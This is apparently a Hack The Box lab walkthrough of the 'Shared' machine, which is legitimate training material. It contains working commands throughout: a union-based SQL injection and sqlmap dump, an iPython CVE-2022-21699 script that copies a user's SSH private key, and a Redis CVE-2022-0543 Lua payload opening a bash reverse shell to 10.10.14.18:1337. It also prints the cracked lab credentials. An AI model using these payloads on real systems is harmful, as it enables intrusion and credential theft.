nmap -p- --min-rate 10000 10.10.11.172 -Pn 
After detection of open ports, let's do greater nmap scan.
nmap -A -sC -sV -p22,80,443 10.10.11.172 -Pn
From nmap scan result, I need to add shared.htb domain into /etc/hosts file for resolving purposes.
While I open web application, I can see such webpage.
Let's start enumeration.
While I try to do Proceed Checkout action, it redirects me into checkout.shared.htb address, let's add this into /etc/hosts file also.
Now, I can see checkout webpage.
Let's look at this request via zaproxy to see full request body and headers.
I started to inject some payloads into custom_cart dictionary by starting ' characters.
Let's inject SQL Comment to see that SQL injection is possible or not. So our payload '-- - should be like this.
As you it still prints the result, it means there' s no Input Validation.
Let's try Union-based SQLI payloads.
custom_cart={"test' UNION SELECT 111,version(),3333-- -":"1"}
That's MariaDB. Let's automate SQL Injection via sqlmap tool by saving this request file as .req
sqlmap -r submit.req --level 5 --risk 3 --technique="U" 
Let's dump all databases via --dbs option.
Let's dump tables from checkout database via adding -D checkout --tables option.
Let's dump all data from user table located on checkout database. We do this -D checkout -T user --dump .
james_mason: fc895d4eddc2fc12f995e18c865cf273 (hash)
Let's crack this hash via Crackstation
james_mason: Soleil101
Let's connect into machine via this credentials by using ssh.
Let's enumerate machine.
First of all, I want to upload pspy64 into machine to see background jobs.
For this, I will open http.server as below.
python3 -m http.server --bind 10.10.14.18 8080
Then download this binary via wget command.
wget http://10.10.14.18:8080/pspy64
After running of this binary, I see that user whose userid is 1001 runs ipython in background.
That's dan_smith user.
Let's look at version of ipython to search publicly known exploits.
That's CVE-2022-21699
Let's start exploiting this vulnerability. So my malicious python script is that stealing user's private key file by copying into /tmp directory.
mkdir -m 777 /opt/scripts_review/profile_default && mkdir -m 777 /opt/scripts_review/profile_default/startup && echo "import os; os.system('cat ~/.ssh/id_rsa > /tmp/dan.key')" > /opt/scripts_review/profile_default/startup/dr4ks.py
Now, let's join into machine via private key file of dan_smith user.
chmod 600 id_rsa
ssh -i id_rsa dan_smith@shared.htbuser.txt
While I run id command, I see that this user belongs to sysadmin group.
Let's search files and directories belong to this group via find command.
find / -group sysadmin 2>/dev/null 
Let's download this into our machine and try to analyze this file
I downloaded it already.
While I run this binary on my box, it returns error as below.
To see target's Redis database, I will configure Local Port Forwarding via ssh command.
ssh -i id_rsa -L 6379:localhost:6379 dan_smith@shared.htb
Now, I can easily run this file and can get output.
As you see, here's say that using password. To get clear-text password, I need to sniff, so I will use Wireshark to see clear-text password.
Note: I need to start sniffer for Loopback.
From packet, you see that auth F2WHqJUz2WEz=Gqq is written, it means our password is "F2WHqJUz2WEz=Gqq".
Let's connect into Redis via this password.
It says that Redis's version is 6.0.15, I searched publicly known exploit and found CVE-2022-0543.
root.txt
We can get root shell by using below payload.
eval 'local os_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_os"); local os = os_l(); os.execute("bash -c \'bash -i >& /dev/tcp/10.10.14.18/1337 0>&1\'"); return 0' 0
Hola I got reverse shell from port 1337.
